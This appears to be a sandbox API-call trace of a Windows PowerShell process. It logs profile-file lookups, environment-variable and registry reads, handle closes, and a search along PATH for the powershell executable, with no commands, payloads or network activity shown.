	[0802.968] SetErrorMode (uMode=0x1) returned 0x1
	[0802.968] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d500 | out: lpFileInformation=0x14d500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.969] SetErrorMode (uMode=0x1) returned 0x1
	[0802.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0802.969] SetErrorMode (uMode=0x1) returned 0x1
	[0802.969] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d500 | out: lpFileInformation=0x14d500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.969] SetErrorMode (uMode=0x1) returned 0x1
	[0802.969] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0802.969] SetErrorMode (uMode=0x1) returned 0x1
	[0802.969] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d500 | out: lpFileInformation=0x14d500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.970] SetErrorMode (uMode=0x1) returned 0x1
	[0802.970] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0802.970] SetErrorMode (uMode=0x1) returned 0x1
	[0802.970] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d500 | out: lpFileInformation=0x14d500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.970] SetErrorMode (uMode=0x1) returned 0x1
	[0802.971] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.971] CoTaskMemFree (pv=0x2b1b20) 
	[0802.971] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.971] CoTaskMemFree (pv=0x2b1b20) 
	[0802.972] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.972] CoTaskMemFree (pv=0x2b1b20) 
	[0802.972] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.972] CoTaskMemFree (pv=0x2b1b20) 
	[0802.973] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.973] CoTaskMemFree (pv=0x2b1b20) 
	[0802.974] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.974] CoTaskMemFree (pv=0x2b1b20) 
	[0802.976] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0802.976] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14d6e0 | out: lpMode=0x14d6e0) returned 1
	[0802.977] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.977] CoTaskMemFree (pv=0x2b1b20) 
	[0802.981] SetEvent (hEvent=0x320) returned 1
	[0802.981] SetEvent (hEvent=0x390) returned 1
	[0802.981] SetEvent (hEvent=0x318) returned 1
	[0802.981] SetEvent (hEvent=0x31c) returned 1
	[0802.983] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.983] CoTaskMemFree (pv=0x2b1b20) 
	[0802.983] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d438 | out: phkResult=0x14d438*=0x350) returned 0x0
	[0802.983] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14d3bc, lpData=0x0, lpcbData=0x14d3b8*=0x0 | out: lpType=0x14d3bc*=0x0, lpData=0x0, lpcbData=0x14d3b8*=0x0) returned 0x2

Thread:
	id = 390
	os_tid = 0xa70


Thread:
	id = 391
	os_tid = 0x1004


Thread:
	id = 1141
	os_tid = 0x3b8


Thread:
	id = 1146
	os_tid = 0x1aa4


Thread:
	id = 1156
	os_tid = 0x10dc


Thread:
	id = 1167
	os_tid = 0x13c4


Thread:
	id = 1170
	os_tid = 0x172c

	[0587.152] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0643.110] RegCloseKey (hKey=0x2f8) returned 0x0
	[0643.110] RegCloseKey (hKey=0x300) returned 0x0
	[0643.111] RegCloseKey (hKey=0x2fc) returned 0x0
	[0746.300] LocalFree (hMem=0x2172e0) returned 0x0
	[0746.300] RegCloseKey (hKey=0x314) returned 0x0
	[0746.300] LocalFree (hMem=0x217290) returned 0x0
	[0746.301] CloseHandle (hObject=0x2e0) returned 1
	[0746.301] CloseHandle (hObject=0x13) returned 1
	[0746.301] CloseHandle (hObject=0xf) returned 1
	[0757.139] RegCloseKey (hKey=0x2e0) returned 0x0
	[0782.465] RegCloseKey (hKey=0x314) returned 0x0
	[0793.814] RegCloseKey (hKey=0x38c) returned 0x0
	[0793.815] RegCloseKey (hKey=0x388) returned 0x0
	[0793.815] RegCloseKey (hKey=0x364) returned 0x0
	[0793.815] RegCloseKey (hKey=0x3a0) returned 0x0
	[0793.815] RegCloseKey (hKey=0x380) returned 0x0
	[0793.816] RegCloseKey (hKey=0x37c) returned 0x0
	[0793.816] RegCloseKey (hKey=0x378) returned 0x0
	[0793.816] RegCloseKey (hKey=0x374) returned 0x0
	[0793.817] RegCloseKey (hKey=0x370) returned 0x0
	[0793.817] RegCloseKey (hKey=0x36c) returned 0x0
	[0793.817] RegCloseKey (hKey=0x368) returned 0x0
	[0793.817] RegCloseKey (hKey=0x340) returned 0x0
	[0793.818] RegCloseKey (hKey=0x39c) returned 0x0
	[0793.818] RegCloseKey (hKey=0x398) returned 0x0
	[0793.818] RegCloseKey (hKey=0x360) returned 0x0
	[0793.818] RegCloseKey (hKey=0x35c) returned 0x0
	[0793.819] RegCloseKey (hKey=0x358) returned 0x0
	[0793.819] RegCloseKey (hKey=0x354) returned 0x0
	[0793.819] RegCloseKey (hKey=0x350) returned 0x0
	[0793.820] RegCloseKey (hKey=0x34c) returned 0x0
	[0793.820] RegCloseKey (hKey=0x348) returned 0x0
	[0793.820] RegCloseKey (hKey=0x344) returned 0x0
	[0793.820] RegCloseKey (hKey=0x394) returned 0x0
	[0793.821] RegCloseKey (hKey=0x334) returned 0x0
	[0793.821] RegCloseKey (hKey=0x330) returned 0x0
	[0793.821] RegCloseKey (hKey=0x32c) returned 0x0
	[0793.822] RegCloseKey (hKey=0x328) returned 0x0
	[0793.822] RegCloseKey (hKey=0x324) returned 0x0
	[0793.822] RegCloseKey (hKey=0x320) returned 0x0
	[0793.822] RegCloseKey (hKey=0x31c) returned 0x0
	[0793.823] RegCloseKey (hKey=0x318) returned 0x0
	[0793.823] RegCloseKey (hKey=0x390) returned 0x0
	[0793.823] RegCloseKey (hKey=0x314) returned 0x0
	[0816.487] RegCloseKey (hKey=0x350) returned 0x0

Thread:
	id = 1211
	os_tid = 0x1a8c


Thread:
	id = 1700
	os_tid = 0x23c8

	[0803.779] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0803.783] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0803.788] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0803.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.788] CoTaskMemFree (pv=0x2b1b20) 
	[0803.790] VirtualQuery (in: lpAddress=0x1c67dd40, lpBuffer=0x1c67ec00, dwLength=0x30 | out: lpBuffer=0x1c67ec00*(BaseAddress=0x1c67d000, AllocationBase=0x1bcf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.793] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0803.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.793] CoTaskMemFree (pv=0x2b1b20) 
	[0803.796] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0803.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.796] CoTaskMemFree (pv=0x2b1b20) 
	[0803.799] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0803.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.799] CoTaskMemFree (pv=0x2b1b20) 
	[0803.821] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0803.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.821] CoTaskMemFree (pv=0x2b1b20) 
	[0803.823] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0803.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.824] CoTaskMemFree (pv=0x2b1b20) 
	[0804.965] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0804.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.965] CoTaskMemFree (pv=0x2b1b20) 
	[0804.970] VirtualQuery (in: lpAddress=0x1c67dff0, lpBuffer=0x1c67eeb0, dwLength=0x30 | out: lpBuffer=0x1c67eeb0*(BaseAddress=0x1c67d000, AllocationBase=0x1bcf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0804.971] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0804.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.971] CoTaskMemFree (pv=0x2b1b20) 
	[0804.973] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0804.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.974] CoTaskMemFree (pv=0x2b1b20) 
	[0804.974] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0804.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.974] CoTaskMemFree (pv=0x2b1b20) 
	[0804.975] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0804.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.975] CoTaskMemFree (pv=0x2b1b20) 
	[0804.980] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0804.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.980] CoTaskMemFree (pv=0x2b1b20) 
	[0806.037] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0806.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.038] CoTaskMemFree (pv=0x2b1b20) 
	[0806.784] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0806.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.784] CoTaskMemFree (pv=0x2b1b20) 
	[0806.786] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0806.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.786] CoTaskMemFree (pv=0x2b1b20) 
	[0806.791] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0806.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.791] CoTaskMemFree (pv=0x2b1b20) 
	[0806.793] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0806.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.793] CoTaskMemFree (pv=0x2b1b20) 
	[0806.794] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0806.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.795] CoTaskMemFree (pv=0x2b1b20) 
	[0806.796] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0806.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.796] CoTaskMemFree (pv=0x2b1b20) 
	[0806.814] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0806.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.814] CoTaskMemFree (pv=0x2b1b20) 
	[0809.344] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0809.345] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0809.345] CoTaskMemFree (pv=0x2b1b20) 
	[0809.348] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0809.348] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0809.348] CoTaskMemFree (pv=0x2b1b20) 
	[0809.348] CoTaskMemAlloc (cb=0x128) returned 0x1b76f660
	[0809.348] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b76f660, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0809.348] CoTaskMemFree (pv=0x1b76f660) 
	[0809.353] CoTaskMemAlloc (cb=0x20e) returned 0x1b741370
	[0809.353] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b741370 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0809.353] CoTaskMemFree (pv=0x1b741370) 
	[0809.357] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0809.358] SetErrorMode (uMode=0x1) returned 0x1
	[0809.361] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.182] SetErrorMode (uMode=0x1) returned 0x1
	[0810.184] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.184] SetErrorMode (uMode=0x1) returned 0x1
	[0810.184] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.171] SetErrorMode (uMode=0x1) returned 0x1
	[0811.172] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.173] SetErrorMode (uMode=0x1) returned 0x1
	[0811.173] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.181] SetErrorMode (uMode=0x1) returned 0x1
	[0811.182] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.182] SetErrorMode (uMode=0x1) returned 0x1
	[0811.182] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.190] SetErrorMode (uMode=0x1) returned 0x1
	[0811.192] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.192] SetErrorMode (uMode=0x1) returned 0x1
	[0811.192] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.200] SetErrorMode (uMode=0x1) returned 0x1
	[0811.201] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.202] SetErrorMode (uMode=0x1) returned 0x1
	[0811.202] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.271] SetErrorMode (uMode=0x1) returned 0x1
	[0812.272] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.273] SetErrorMode (uMode=0x1) returned 0x1
	[0812.273] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.281] SetErrorMode (uMode=0x1) returned 0x1
	[0812.282] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.283] SetErrorMode (uMode=0x1) returned 0x1
	[0812.283] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.291] SetErrorMode (uMode=0x1) returned 0x1
	[0812.293] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.293] SetErrorMode (uMode=0x1) returned 0x1
	[0812.293] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.302] SetErrorMode (uMode=0x1) returned 0x1
	[0812.303] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.303] SetErrorMode (uMode=0x1) returned 0x1
